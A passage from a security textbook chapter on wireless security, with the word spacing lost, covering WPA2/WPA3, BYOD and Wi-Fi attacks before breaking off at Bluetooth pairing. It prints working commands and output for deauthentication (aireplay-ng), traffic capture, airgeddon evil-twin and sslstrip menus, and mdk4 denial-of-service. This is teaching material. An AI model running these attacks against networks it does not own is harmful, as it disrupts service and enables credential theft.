ssword.TheauthenticationframeworkusedistheExtensibleAuthenticationProtocol(EAP)andthedifferentvariationsofEAP.Figure 11.7showsalistofdifferentEAPvariationsandWi-­Fi otherauthenticationprotocolsthatmaybeused.ThisisfromaconfigurationpageonaLinuxsystem,settingupawirelessnetworkconnection.FIGURE 11.6 Four-­wayhandshakeforWPA2STAAPANonceSTAconstructsthePTKSNonce+MICAPconstructsthePTKGTK+MICAckFIGURE 11.7 WirelessconfigurationunderLinux449450 Chapter11  WirelessSecurity■AcoupleofcommonvariationsaretheLightweightExtensibleAuthenticationProtocol(LEAP)andtheProtectedExtensibleAuthenticationProtocol(PEAP).Theseframeworks,alongwithothers,likeEAP-­TLS,areusedtoensurethattheauthenticationisdoneoveraprotectedchannelsoanyauthenticationparametersarenotsentintheclear.Additionally,anykeyexchangeisdoneacrossaprotectedchannel.Often,thisisoverTransportLayerSecurity(TLS).Thisisthemeansbywhichwebtrafficisencrypted.Itmakesuseofcertificatesandtheasymmetrickeyencryptionusingpublicandprivatekeys.Wi-­FiProtectedAccess3In2018,theWi-­FiAllianceintroducedWi-­FiProtectedAccess3(WPA3)tohelpprotectagainstsomeoftheweaknessesinWPA2.Thefirstthingisallowinglongerencryptionkeys,uptoAES-­256 withSHA-­384forcryptographichashingtoperformmessageauthentication.Additionally,WPA3 introducesSimultaneousAuthenticationofEquals(SAE)todisposeofthepre-­sharedkey.Usingapre-­sharedkeyisaweaknessbecauseit’sapieceofinformationthatmaybehardtofullyprotect.Whenpre-­sharedkeysareusedforauthentication,anyonewhocangetthepre-­sharedkeywillbeabletoperformauthentication.SAEisapassword-­basedauthenticationstrategyusedtoagreeonkeysthatarethenusedtoencryptthesessionbetweenthestationandtheaccesspoint.WPA3alsocontinuestomandatetheuseofCounterModeCipherBlockChainingMessageAuthenticationCodeProtocol,alsoknownasCCMmodeprotocol(CCMP).ThisisasetofcryptographicprotocolsputtogethertoaddressweaknessesfromWEP.Itusesacombinationofencryptionalongwithauthenticationandintegritytoensurethatmessageswerenottamperedwith,andthatthosemessagesoriginatefromthecorrectendpoint.Thishelpsprotectagainstman-­in-­the-­middleattacks.CCMPusesablockcipherforencryptionsomessagesareencryptedinfixed-­lengthblocks.Whilemeet-­in-­the-­middleattacks,whereplaintextcanbeusedtoattacktheencryption,arepossible,CCMPhelpsprotectagainstthesesortsofattacks.Ameet-­in-­the-­middleattackisawayofweakeningthekeystrengthusedtomakeiteasiertobruteforcethedecryptionprocess.BringYourOwnDeviceYouprobablyhaveatleastonemobiledevice,whetherit’sasmartphone,atablet,oralaptop.ItmayalsobeahybriddevicelikeMicrosoft’sSurface.Becauseoftheprevalenceofthesedevicesandtheireaseofuse,peoplecarrythemaroundandhaveatleastsmartphoneswiththemnearlyallthetime.Companiesoftenwanttotakeadvantageofthesecomputingresources,sotheymayhavepoliciesaroundhowtoallowpeopletousetheirowndevicesonenterprisenetworks.Thispolicyistypicallyreferredtoasbringyourowndevice(BYOD).Acompanymayrequiredevicestobeapprovedormeetcertainminimumrequirements.Acompanythatallowspersonaldevicesontheirnetwork,generallythroughwirelessnetworksbecausemobiledevicesgenerallydon’thavewiredconnections,maybeopentoanydeviceconnecting.Thismeanstheymaynothaveaformofnetworkaccesscontrol(NAC)thatcanrestrictwhichdevicescantalktotheirwirelessnetworks.TheycandothisbyblockingMACaddressestopreventanyonenotonthewhitelistfromevengettingtothepointofWi-­Fi 451user-­levelauthentication.Asshownearlier,WPA2 withEnterpriseauthenticationalsoprovidesprotectionbyrequiringthatusersauthenticate.AnotherthingtoconsiderwhenitcomestoaccessingoverWi-­Fiisnetworkisolation.It’scommonforbusinessestoputWi-­Ficlientsintoanisolatednetworkthatbehavesasthoughit’soutsidetheenterprise.Toaccessinternalcorporateresources,anyoneontheWi-­Finetwork,evenafterauthentication,hastouseavirtualprivatenetworkconnectiontogetaccesstobusinessassets.Theyconnecttoapassword-­protectedWi-­FinetworkusingWPA2-­Enterpriseauthenticationandencryption,andthentheyhavetofurtherauthenticatetogetatunnelopentotheinsideofthenetwork.ThismeansevenifyougetaccesstotheemployeeWi-­Finetwork,typicallyseparatefromtheguestWi-­Finetworkthatmayalsobeavailable,youstillwon’thaveeasyaccesstobusinessassets.CompaniesthathaveembracedBYOD,however,mayhavemadeiteasiertogainaccesstotheirresources.Ofcourse,BYODisn’ttheonlywayemployeescangetaccesstocorporateresourcesoverWi-­Fi,butifBYODisenabled,itlikelymeanstherearen’trestrictionsaboutdevicesthatcanconnect,preventingsomeonefromevenbeingabletoprovideauthenticationcredentialstogetaccess.Wi-­FiAttacksTherearedifferentwaystoattackWi-­Finetworks.First,aswithanytypeofattack,youcanstartwithreconnaissance.TherearewaystodothatusingWiresharkandothertools.Whatyouneedwhenyouaresniffingistogeneratetraffic.Onewaytodothatistoforceendpointstoauthenticatethemselves.Youcanuseadeauthenticationattacktodothat.Anotherattackissomethingcalledtheeviltwin.Thisisarogueaccesspoint,butonethatmimicsalegitimateaccesspoint.Thereisalsoakeyreinstallationattack,sometimescalledKRACK,whichcanbeusedtoforceendpointstosendmessagesinawaythatattackerscandecryptthemeasily.TestingNetworksYouprobablydon’twanttoperformtestingonyourownnetworksinceitwilldisrupttraffic.Anydevicethatreliesonwirelessconnectivityforoperationwillstopfunctioningcorrectlywhenyouperformsomeoftheseattacks.Itwouldalsoberudetotestagainstyourneighbors’accesspoints.It’sprobablyhelpfultogetanotheraccesspointthatyoucantestagainst.SniffingAsnotedearlier,Wiresharkcanbeusedtocapturenetworktrafficthatincludestheradioheaders.Theradioheadersareimportantwhenyouaretryingtogatherinformation.Theyarenottheonlyheadersthatcarryinformation,though.Youwillwanttoseeallthebeaconsfromtheaccesspointsandanyauthenticationmessagesthatmaybesentbetweenstationsandaccesspoints.Toseetheentirestack,youneedtosetyourwirelessinterface452 Chapter11  WirelessSecurity■intomonitormode.Onewaytodothisisbyusingtheairmon-­ngprogramfromtheaircrack-­ngpackage.Inthefollowingcodelisting,youcanseetheuseofairmon-­ngtocreateamonitorinterfacefromawirelessinterface.Intheend,youhaveanewinterfacethatyoucanusetocollectradioandothertraffic.Usingairmon-­ng[email protected]:~#airmon-­ngstartwlan0 Found3processesthatcouldcausetrouble.Killthemusing'airmon-­ngcheckkill'beforeputtingthecardinmonitormode,theywillinterferebychangingchannelsandsometimesputtingtheinterfacebackinmanagedmode PIDName640wpa_supplicant30835NetworkManager30859dhclient PHYInterfaceDriverChipset phy0wlan0rt2800usbRalinkTechnology,Corp.RT5372 (mac80211monitormodevifenabledfor[phy0]wlan0on[phy0]wlan0mon)(mac80211stationmodevifdisabledfor[phy0]wlan0)You’llnoticesomewarningsatthestart.ThisisbecausetheversionofLinuxthisisrunningundermanagesthenetworkinterfaces.airmon-­ngneedstobeabletomakechangesto thenetworkinterfaces,meaningit’sbetteriftheprocessesmanagingtheinterfacesaren’trunning.WhilethisexampleisrunningunderLinux,aircrack-­ngdoeshaveaWindowspackage,andthesameprogramscanbeusedthere.Oncethemonitorinterfacehasbeencreated,youcanuseitasyouwouldanyothernetworkinterface.Youcanusetcpdumptocaptureallnetworktrafficthatpassesacrossthemonitorinterface.Inthefollowinglisting,youcanseetheuseoftcpdumpusingtheinterfacewlan0mon,whichwascreatedbyairmon-­ng.UsingtcdumpwithaMonitorInterface[email protected]:~#tcpdump-­iwlan0montcpdump:verboseoutputsuppressed,use-­vor-­vvforfullprotocoldecodeWi-­Fi 453isteningonwlan0mon,link-­ltypeIEEE802_11_RADIO(802.11plusradiotapheader),capturesize262144bytes20:49:20.7474331.0Mb/s2457MHz11b-­19dBmsignalantenna1DataIV:8caePad20KeyID220:49:21.1905211.0Mb/s2457MHz11b-­43dBmsignalantenna1Clear-­To-­SendRA:64:1c:b0:94:ba:57(ouiUnknown)20:49:21.3878781.0Mb/s2457MHz11b-­67dBmsignalantenna1ProbeRequest(WifiMyqGdo)[1.02.05.511.0Mbit]20:49:21.4032891.0Mb/s2457MHz11b-­67dBmsignalantenna1ProbeRequest(WifiMyqGdo)[1.02.05.511.0Mbit]20:49:21.5371651.0Mb/s2457MHz11b-­47dBmsignalantenna1ProbeRequest(ZoeyWasHere)[1.02.05.511.0Mbit]20:49:21.5898091.0Mb/s2457MHz11b-­19dBmsignalantenna1AcknowledgmentRA:64:1c:b0:94:ba:57(ouiUnknown)20:49:21.6892301.0Mb/s2457MHz11b-­43dBmsignalantenna1Clear-­To-­SendRA:64:1c:b0:94:ba:57(ouiUnknown)20:49:23.2470161.0Mb/s2457MHz11b-­67dBmsignalantenna1AcknowledgmentRA:ec:aa:a0:4d:31:a8(ouiUnknown)20:49:23.2508141.0Mb/s2457MHz11b-­65dBmsignalantenna1AcknowledgmentRA:f6:aa:a0:4d:31:a8(ouiUnknown)20:49:23.5943991.0Mb/s2457MHz11b-­19dBmsignalantenna1AcknowledgmentRA:64:1c:b0:94:ba:57(ouiUnknown)20:49:23.6028311.0Mb/s2457MHz11b-­21dBmsignalantenna1Beacon(CasaChien)[1.0*2.0*5.5*11.0*6.09.012.018.0Mbit]ESSCH:11,PRIVACY20:49:24.2584851.0Mb/s2457MHz11b-­43dBmsignalantenna1Clear-­To-­SendRA:64:1c:b0:94:ba:57(ouiUnknown)20:49:24.6354821.0Mb/s2457MHz11b-­57dBmsignalantenna1ProbeRequest(CasaChien)[1.02.05.511.06.09.012.018.063.5Mbit]20:49:24.6563241.0Mb/s2457MHz11b-­51dBmsignalantenna1AcknowledgmentRA:18:d6:c7:7d:ee:11(ouiUnknown)20:49:24.6587531.0Mb/s2457MHz11b-­51dBmsignalantenna1AcknowledgmentRA:70:3a:cb:52:ab:fc(ouiUnknown)Fromthetcpdumpoutput,youcanseealloftheradiotraffic,includingsignalinfor­mation.Youcanseethefrequencybeingusedforthecommunication,2457 MHzinallthemessages.Youcanalsoseethesignalstrength.Thisismeasuredindecibelsinrelationtoamilliwatt,expressedasdBm.Thedecibelisaratiooftwovaluesusingalogarithmicscale.ThedBm,however,isn’taratio.It’sanabsolutevalue,asitusesthemilliwattasareferencepoint.Itisastandardwayofmeasuringsignalstrengthinwirelessnetworks.Theverybestsignalyoucangetis–10dBm.Youcanseevaluesof–19dBmto–67dBm.Thesearestillusablesignals.Thelowestyoucangetinawirelessnetworkis–100.Anythingbeyondthatisn’tusable.454 Chapter11  WirelessSecurity■Whatyoucanseefromthetcpdumpoutputareproberequestsfornetworks.Theseproberequestsarecomingfromdevicesthatwereonceconnectedtothesenetworks.Forexample,thereisagaragedooropenerthathaswirelesscapabilitiestryingtofindthenetworkWifiMyqGdo.Thisisthenetworkthatthedeviceisconfiguredwithwhenitcomesfromthemanufacturer.Thisinformationmaybeusefulifyoutrytodoaneviltwinattack.However,youmaywanttoseeotherinformationfromthepacketcapture.Whatyoucandoisjustwriteoutthepacketcapture.Inthefollowinglisting,youcanseewritingoutthepacketcapturefromtcpdump.Becauseweareusingthemonitorinterface,we’llstillget alloftheradiomessages.Writinga Capturefrom aMonitorInterface[email protected]:~#tcpdump-­wradio.pcap-­iwlan0montcpdump:listeningonwlan0mon,link-­typeIEEE802_11_RADIO(802.11plusradiotapheader),capturesize262144bytes^C125packetscaptured126packetsreceivedbyfilter0packetsdroppedbykernelOnceyouhaveasavedpacketcapture,youcanopenitinaprogramlikeWireshark.Figure 11.8showsthesameproberequestmentionedearlierinmoredetail.HereyoucanseenotonlytheSSID,youcanalsoseesomeofthecapabilitiesbeingrequestedbythestation.You’llalsoseethechannelbeingrequestedandthevendorIDoftheequipment.Thisispartofwhatmakesitclearit’sagaragedooropener.ThevendorIDforthesendingdeviceisChamberlainGroup,whichisthecompanythatownsLiftMastergaragedooropeners.You’llalsoseethereisvendor-­specificinformationintheprobeforBroadcom.Broadcomisacommonwirelesschipsetmanufacturer.ThissuggeststhatthereisanexpectationthatthewirelessdeviceknowsaboutBroadcomcapabilitiesandexpectstocommunicateusingsomeofthem.FIGURE 11.8 ProberequestinWiresharkWi-­Fi 455Wiresharkcanalsoprovideadditionaldetailsaboutthewirelessconnectionthatyouwerenotabletoseeintcpdump.InFigure 11.9,youcanseetheradioheaderinformation.Thisincludesthechannelfrequencyandnumberaswellasthesignalstrength.Intheory,thesignalstrengthcangiveyouanindicationoftheproximityoftheradioyouarelookingat.Thisdoesassumethatallradiosandantennasareroughlyequivalent,meaningsignalstrengthwouldbeafunctionofdistance.Inpractice,however,therearealotofotherfactors,includinganymaterialsthesignalispassingthrough.Signalsdon’tpassverywellthroughconcreteormetal,forexample.Radioheadersandotherwirelesspacketscanprovideuswithsomeinformation.Oneofthechallengeswiththisisthatyouaregoingtomissdataunlessyouknowthechannelofthewirelessnetworkyouwanttosniff.Ifyouarejusttryingtogenerallygatherdata,youmaybeabletofrequency-­orchannel-­hopifyourcard’sdriversupportsthat.Whenyouchannel-­hop,though,youaremovingfromonechanneltoanother,listeningoneachnewchannel.Youaremissingdataonalltheotherchannels.Thisisalimitationofwirelesscards,justaswithanyotherradio.Youcantuneintoonlyasinglefrequencyatatime.Thismeansit’sbesttodosomescanningaheadoftimetoidentifywhichchannelthenetworkyoureallycareaboutlisteningison.FIGURE 11.9 RadioheadersinWiresharkDeauthenticationAttackAdeauthenticationattacksendsmessagesthatforcestationstoreauthenticateagainsttheaccesspoint.Essentially,itlogsoutanystation,makingthestationreestablishtheassociation.Thisisanotherplacetousetheaircracksuiteoftools.Inthiscase,we’regoingtouseaireplay-­ng.Asdiscussed,theinterfaceneedstobeontherightchanneltoknowwhatfrequencytosendmessageson.UnderLinux,thisisdoneusingtheiwconfig456 Chapter11  WirelessSecurity■program.UnderWindows,thisisdonethroughthedevicepropertiesofthewirelessinterface.Inthefollowingcode,youcanseesettingthecorrectchannelfortheaccesspointandthenrunningadeauthenticationattack.Youwillsee10deauthenticationmessagesbeingsenttothestation.DeauthenticationAttack[email protected]:~#sudoiwconfigwlan0monchannel6[email protected]:~#aireplay-­ng-­010-­aC4:EA:1D:D3:78:39-­c64:52:99:50:48:94wlan0mon18:22:59Waitingforbeaconframe(BSSID:C4:EA:1D:D3:78:39)onchannel618:23:00Sending64directedDeAuth(code7).STMAC:[64:52:99:50:48:94][0|62ACKs]18:23:00Sending64directedDeAuth(code7).STMAC:[64:52:99:50:48:94][0|60ACKs]18:23:01Sending64directedDeAuth(code7).STMAC:[64:52:99:50:48:94][0|34ACKs]18:23:01Sending64directedDeAuth(code7).STMAC:[64:52:99:50:48:94][0|32ACKs]18:23:02Sending64directedDeAuth(code7).STMAC:[64:52:99:50:48:94][0|61ACKs]18:23:02Sending64directedDeAuth(code7).STMAC:[64:52:99:50:48:94][0|57ACKs]18:23:03Sending64directedDeAuth(code7).STMAC:[64:52:99:50:48:94][0|59ACKs]18:23:03Sending64directedDeAuth(code7).STMAC:[64:52:99:50:48:94][1|56ACKs]18:23:04Sending64directedDeAuth(code7).STMAC:[64:52:99:50:48:94][0|55ACKs]18:23:05Sending64directedDeAuth(code7).STMAC:[64:52:99:50:48:94][0|43ACKs]Toperformthisattack,youneedtohavetheBSSIDoftheaccesspoint.ThisistheMACaddressforthedevice,soitcanbeusedintheframeheaders.YoualsoneedtheMACaddressofthestationonwhichyouwanttorunthedeauthenticationattack.Youcanalsorundeauthenticationsagainstallstationsbyomittingthe-­cparameter,whichistheclientMACaddress.Togetsomeadditionaldetailstorunthisattack,youcanuseairodump-­ng,anotherprogramintheaircrack-­ngsuiteofprograms.Inthefollowinglisting,youcanseetheoutputofairodump-­ng.You’llseealloftheBSSIDsthatarewithinrangeofthesystemonwhichairodumpisbeingrun.ThisgivesyoutheBSSID,thepowerlevel,thenumberofbeacons,thechannelnumber,andotherdetails.Atthebottom,youcanseethestationsandtheSSIDstheyareassociatedwith.Wi-­Fi 457Usingairodump-­ngtoAcquireInformationCH6][Elapsed:6mins][2018-­12-­1618:22 BSSIDPWRBeacons#Data,#/sCHMBENC18:D6:C7:7D:EE:11-­21309955C4:EA:1D:D3:78:39-­362181670:3A:CB:52:AB:FC-­4021170:3A:CB:15:F5:A1-­41FA:8F:CA:6C:2D:6DCIPHERAUTHESSID011195WPA2CCMPPSKCasaChien06130WPA2CCMPPSKCenturyLink51910011130WPA2CCMPPSKCasaChien13912101130WPA2CCMPPSKCasaChien-­421600011130OPN70:3A:CB:4A:41:3B-­4421115606130WPA2CCMP92:CD:B6:13:FE:3C-­551960066570:8B:CD:CD:92:30-­6516417011195WPA2CCMPPSKHide_Yo_Kids_Hide_Yo_WiFiEC:AA:A0:4D:31:A8-­670009195WPA2CCMPPSKHOME-­C377-­2.4A0:04:60:21:34:12-­660609-­1WPA MasterBedroomTV.mPSKOPNCasaChienHP-­Setup>3c-­M277LaserJet BSSIDSTATIONPWRRateLostFrames(notassociated)94:9F:3E:01:10:FB-­360-­0023(notassociated)F0:18:98:0C:34:69-­380-­102Probe Sonos_lHe9qyhhveucJ2UnQWM67LjZ9g(notassociated)F0:6E:0B:69:60:1B-­400-­1012(notassociated)78:28:CA:09:8E:41-­460-­0045Sonos_lHe9qyhhveucJ2UnQWM67LjZ9g(notassociated)94:9F:3E:00:FD:83-­460-­0041Sonos_lHe9qyhhveucJ2UnQWM67LjZ9g(notassociated)94:9F:3E:0F:1D:81-­460-­0045Sonos_lHe9qyhhveucJ2UnQWM67LjZ9g(notassociated)38:8B:59:20:E9:DF-­480-­1021(notassociated)90:CD:B6:13:7E:3C-­500-­1034ZoeyWasHere(notassociated)64:52:99:50:48:94-­640-­1022WifiMyqGdo(notassociated)C0:97:27:5A:2D:F1-­680-­102(notassociated)34:7C:25:25:AB:92-­560-­10218:D6:C7:7D:EE:1138:F7:3D:04:92:79-­340e-­0e2251718:D6:C7:7D:EE:1164:1C:B0:94:BA:57-­460-­1e01718:D6:C7:7D:EE:1194:9F:3E:0F:1D:80-­46013618:D6:C7:7D:EE:11F0:81:73:95:8C:47-­58011318:D6:C7:7D:EE:1194:9F:3E:00:FD:82-­4418-­240770:3A:CB:15:F5:A194:9F:3E:01:10:FA-­3654-­2403870:3A:CB:15:F5:A100:FC:8B:AB:0B:B8-­4401770:3A:CB:4A:41:3B78:28:CA:09:8E:40-­4608054-­240e-­6e0e-­6e48-­24458 Chapter11  WirelessSecurity■Thereareacoupleofreasonsyoumightwanttorunadeauthenticationattack.OneistogetahiddenESSID.SincetheESSIDisn’tbeingbroadcast,youcan’tretrieveitfromanannouncementfromtheaccesspoint.Youcan,though,gettheESSIDfromastationtryingtoassociatewithanaccesspoint.Ifyouforcetheclientintoanunauthenticatedstate,thatstationwillneedtoreauthenticate,whichwillallowyoutocapturetheESSIDfromtheclientwhenitreassociates.Anotherreasonistocapturehandshakesduringassociation.UnderWEP,thistrafficwouldallowfortheretrievaloftheencryptionkey.Thismeansifyoualsocapturedalltheencryptedtraffic,youwouldbeabletodecryptit.Thiswasbecauseofaweaknessinthecalculationoftheinitializationvector,arandomnumberusedtoseedthekey.Thevalueendedupnotbeingtrulyrandom,soitcouldbeidentified.Thisdoesn’tworkwithWPA2,though.TheweaknessfromWEPdoesn’texistinWPA2.Thisisnottosaytherearen’totherwaystoattackWPA2 networks.EvilTwinAneviltwinisarogueaccesspointconfiguredtolookjustlikealegitimateaccesspoint,meaningitadvertisesaknownSSID.Youwouldthinkthiswasafairlyeasythingtodo.Youcouldjustsetupanaccesspointandletstationsassociatetoit.Thatmaynothelpyou anawfullot,though.Youcouldgetsystemsontoanetworkyoucontrol,hopingyoucouldcompromisethem.Youcouldalsopotentiallycaptureunencryptedwebtraffic,whichmayincludeusernamesandpasswords.However,betterwouldbetogatherinformationfromthestations,suchasauthenticationinformationor,asneeded,aPSK.Thiswouldgiveyouameanstogainaccesstotheenterprisenetwork.Gettingthisinformation,though,requiresmorethanjustanaccesspoint.Ideally,youwouldhaveanintelligentmeansofinteractingwiththestationsandcollectinginformationtheymayhave.Thereareafewprogramsyoucanusethatwillmakelifealoteasierforyouifyouwanttouseaneviltwinattack.Oneprogramiswifiphisher,whichcanbeusedtoimpersonateawirelessnetworkwhilejammingalegitimateaccesspointandthenredirecttraffictoasitemanagedbyyou.Thismeansyoudon’thavetoworryaboutanyencryptionissues,ifyouwanttopretendtobeacommonlyvisitedwebsite.Youdon’thavetotrytodecryptthetrafficbecauseyoucanjustcaptureitfromyourwebpages.Anothertoolyoucanuseisairgeddon.ThisisaprogramthatwillworkonLinuxdistributionsandcanbeusedforseveraltypesofwirelessattacks.Inthecodelistingthatfollows,youcanseetheinitialmenu,afterithastestedyoursystemforcompatibilityaswellastheexistenceofallofthetoolsandlibrariestheprogramwillneed.Manyoftheattacksrequiretheinterfacetobeputintomonitormode,whichairgeddoncando.Ratherthanputtingtheinterfaceintomonitormodeaspartofanattack,it’samenuoption.You’llalsoseethereisaHandshaketoolsmenuselection.Thisiswhereyoucouldcapturethehandshakesdoneaspartofassociation.Wi-­Fi 459airgeddonAttackMenuInterfacewlan0selected.Mode:Managed.Supportedbands:2.4Ghz Selectanoptionfrommenu:-­-­-­-­-­-­-­-­-­0.Exitscript1.Selectanothernetworkinterface2.Putinterfaceinmonitormode3.Putinterfaceinmanagedmode-­-­-­-­-­-­-­-­-­4.DoSattacksmenu5.Handshaketoolsmenu6.OfflineWPA/WPA2decryptmenu7.EvilTwinattacksmenu8.WPSattacksmenu9.WEPattacksmenu-­-­-­-­-­-­-­-­-­10.About&Credits11.OptionsandlanguagemenuWeweretalkingabouteviltwinattacks,though.That’salsoamenuselection.OnceyouselectEvilTwinAttacksMenu,youarepresentedwithanothersetofmenuoptions.Again,youcanputtheinterfaceintomonitormode.Youwillalsobeabletochoosedifferenttypesofeviltwinattacks.Justcreatinganeviltwinaccesspointisagoodstart,butifyouusethatattack,youwillneedtobringinothertoolstocapturedata.It’seasiesttoletairgeddonjustsetupthecompleteattackforyou.Youcanseethatinadditiontotheeviltwin,youcanenablesniffingandsslstrip.Theuseofsslstripwillhelptopotentiallydecryptwebtraffic.Ifthisattackworks,youwillgetwebtrafficinplaintext.Youcanalsousebettercaptoperformspoofingattacksontopofjustseeingwirelesstraffic.ThisalsoallowsyoutousetheBrowserExploitationFramework(BeEF)toexploitvulnerabilitiesinbrowsers.Thiscouldletyoucompromiseasystemthroughsomeoneusingtheirwebbrowser.EvilTwinAttackMenu***************************EvilTwinattacksmenu*****************************Interfacewlan0selected.Mode:Managed.Supportedbands:2.4GhzSelectedBSSID:None460 Chapter11  WirelessSecurity■EvilTwinAttackMenu(continued)Selectedchannel:NoneSelectedESSID:None Selectanoptionfrommenu:-­-­-­-­-­-­-­-­-­0.Returntomainmenu1.Selectanothernetworkinterface2.Putinterfaceinmonitormode3.Putinterfaceinmanagedmode4.Explorefortargets(monitormodeneeded)-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­(withoutsniffing,justAP)-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­5.EvilTwinattackjustAP-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­(withsniffing)-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­6.EvilTwinAPattackwithsniffing7.EvilTwinAPattackwithsniffingandsslstrip8.EvilTwinAPattackwithsniffingandbettercap-­sslstrip2/BeEF-­-­-­-­-­-­-­-­-­-­-­-­-­(withoutsniffing,captiveportal)-­-­-­-­-­-­-­-­-­-­-­-­-­9.EvilTwinAPattackwithcaptiveportal(monitormodeneeded)-­-­-­-­-­-­-­-­-­Onethingtonotehereisthatairgeddonrequirestwowirelessinterfacestoperformaneviltwinattack.ItneedsthissecondinterfaceforDoSpursuitmode,whichpreventsthefrequencyhoppingthatcanbeaprotectionagainstwirelessattacks.Thesecondinterfaceisalsousedtoperformadenial-­of-­serviceattackagainstthelegitimateaccesspoint.Thiskeepsitfromrespondingtothestationinsteadoftherogueaccesspoint.Whileairgeddonisausefultool,thereisnothingitdoesthatisunique.Underthehood,itisusingacollectionoftoolsthatyouneedtoalreadyhaveinplace,likehostapd,aDHCPserver,DNSspoof,andalightweightHTTPserver.Theadvantagetoairgeddonisthatitpullsallofthosetoolstogether.Thismakescomplex,multitoolattacksconsiderablyeasier.Allyouneedtodoisrunairgeddonratherthanhavingtosetupseveraltoolsandget alltheparametersrightwiththemrunninginthecorrectorder,asneeded.KeyReinstallationSofar,youmayhavegottentheimpressionthatwirelessnetworksthatareusingWPA2areinvulnerabletoattack,shortofpretendingtobethelegitimatewirelessnetwork.Whenastationgoesthroughafour-­wayhandshake,oneoftheoutcomesisasessionkeythatgetsusedforencryptionanddecryption.It’scalledasessionkeybecauseit’susedforthedurationofthesessionwhilethestationisconnectedtotheaccesspoint.AsthesearepotentiallyWi-­Fi 461vulnerableovertime,theyareoftenreplacediftheconnectionismaintainedoveralongperiodoftime.Thisisnottheonlyproblemwithsessionkeys.Sincesessionkeysarederivedratherthanknownaheadoftime,ifanattackercanforcetheuseofaknownvalueduringkeyderivation,thekeycanbeknown.Thefour-­wayhandshakeisusedtoallowthestationandtheaccesspointtoderiveakeybasedonarandomvalue,ornonce,thatispassedbetweenthetwoends.Inthethirdmessageofthehandshake,theclienthaswhatitneedstoinstallthekeyusedforthesession.Sincemessagescangetlost,especiallyasstationsgetfartherfromtheaccesspoint,thatthirdmessagecanberetransmittedmultipletimes.Wecantakeadvantageofthisinordertoreplaymessagesthathavebeencapturedpreviously.Iftheuseofaknownnoncecouldbeforced,theencryptionkeywouldbeknownbytheattacker.Sincethekeyisknown,messagescanbedecryptedoreveninjectedintothecommunicationschannel.Ifnoncevaluetransmissionscanbereplayed,itmeansanykeycreationisvulnerabletoattack.Thisnotonlymeansthesessionkeybetweenastationandanaccesspointbutalsothegroupkey.Thisexposesmulticastandbroadcasttransmissionsoverawireless network.Anymodernwirelessnetwork,whethertheyareusingWPAorWPA2,Enterprise orPersonal,maybevulnerabletothissortofattack.Asofthiswriting,therearenotalotoftoolsavailabletoautomatetheexploitationofthisKeyReinstallationAttack(KRACK).Thereare,however,somefixesavailablefornetworkelements.Usingmdk3/4Severaltoolsexistforwirelessattacks.Oneofthesethatcanbeusedformultipletypesofattackismdk3/mdk4.Thisisatoolthatcanbeusedtoperformbeaconflooding,authenticationdenial-­of-­serviceattacks,anddeauthenticationattacks,alongwithothertests.ThisisatoolthatcanbeinstalledinKaliLinuxandParrotOS.Bothversionsareavailableinbothoperatingsystems.Togetstarted,youneedtoenablemonitormodeonthewirelessinterface.Youcandothisbyusingairmon-­ngfromtheAircracktoolkit.Thefollowingisthecommandusedtoturnonmonitormodeontheinterfacewlan0onwirelesschannel1:[email protected]$airmon-­ngstartwlan01Onceyouhavemonitormodeenabled,youcanstartlaunchingattacks.WecanstartanauthenticationattackonallavailableSSIDsonthechannelyouspecifiedwhenyouturnedonmonitormode.Thefollowingisthecommandusedtoruntheauthenticationattackusingtheinterfacewlan0mon:[email protected]$sudomdk4wlan0monaWaitingfortargets...FoundnewtargetAP60:5F:8D:CD:77:A9FoundnewtargetAPF8:BC:0E:05:BB:89FoundnewtargetAPF8:BC:0E:05:D1:C9462 Chapter11  WirelessSecurity■FoundnewtargetAP54:83:3A:AF:99:9DFoundnewtargetAP88:DA:1A:27:EB:C4FoundnewtargetAPF8:BB:BF:7A:BF:03ConnectingClientF6:28:45:5A:18:ABtotargetAP60:5F:8D:CD:77:A9Status:NoResponse.Packetssent:1-­Speed:1packets/secThisisabroadstrokeattack,whichisn’tgenerallywhatyouwouldbedoing.OtherattackswouldbetargetedatindividualSSIDs.Fortheseattacks,you’dneedtoprovidesomeadditionalinformation.Youcoulduseabrute-­forceattacktodeterminewhetheranSSIDwascloaked.ItwillalsolookforwhetheranSSIDisavailablewithinrange.ThefollowingisoneoftheseattacksagainstanSSIDnamedWubbleWiFi:[email protected]$sudomdk4wlan0monp-­eWubbleWiFiAPrespondedon0of1probes(0percent)Packetssent:1-­Speed:1packets/secAPrespondedon0of127probes(0percent)Packetssent:128-­Speed:127packets/secWirelessAttacksUsemdk4toperformtestingonanaccesspointinyourarea.Youshouldtrytoperformadeauthenticationattack.YoucanwatchtheattacktoseehowitworksusingWiresharktomonitortheradiotraffic.BluetoothIt’snotonlynetworktransmissionthathasgonewireless.Peripheralshavealsogonewireless.Morethanthat,anytwodevicesthatwouldcommonlycommunicateoverawire mayuseawirelessprotocolcalledBluetooth.Bluetoothisawirelessprotocolallowingforshort-­rangecommunicationbetweenonedeviceandanother.ItoperatesinthesetoffrequenciesreferredtoastheISMbandof2.4 GHz.802.11usesaportionofthesamefrequencyspectrum.WhileaClassABluetoothdevicehasarangeofabout100 metersduetoahigherstrengthsignal,mostBluetoothdeviceshavearangeofabout10 meters,requiringcloseproximitytointeractwiththem.Bluetoothoffersanumberofcapabilities,describedbyprofiles.EachBluetoothdevicewillimplementasetofprofiles,dependingontherequirementsforthedevice.Forexample,Bluetooth 463aBluetoothheadsetwouldimplementtheAdvancedAudioDistribution(A2DP)profile.Thisprofiledefineshowmultimediaaudiomaybestreamedfromonedevicetoanother.Thisisnottheonlyprofileaheadsetwouldimplement,soeachBluetoothdevicemayimplementseveralprofiles.Whentwodevicesarepaired,theysharetheircapabilities,meaningtheytelleachotherwhatprofilestheysupport.Thepairingprocessleadstoabondbetweentwodevices.Pairingrequiresverification,soeachdeviceshouldprovideameansofindicatingitexpectstoandwantstopairwiththeotherdevice.Earlydevicesusedasimplefour-­digitnumber(PIN),whichneededtobeprovidedtoindicatethatthedevicerequestingtopairknewthevalue.Devicesthathadlimitedinputcapabilities,likeaheadsetorearpiece,wouldhaveavaluehard-­coded.Youwouldbeprovidedwiththecorrectvalueaspartofthedocumentationforthedevice.LaterversionsofBluetoothexpandedthecapabilitiesavailabletoverifypairingrequests.WithBluetoothv2.1,SimpleSecurePairing(SSP)wasintroduced.Therewerefour 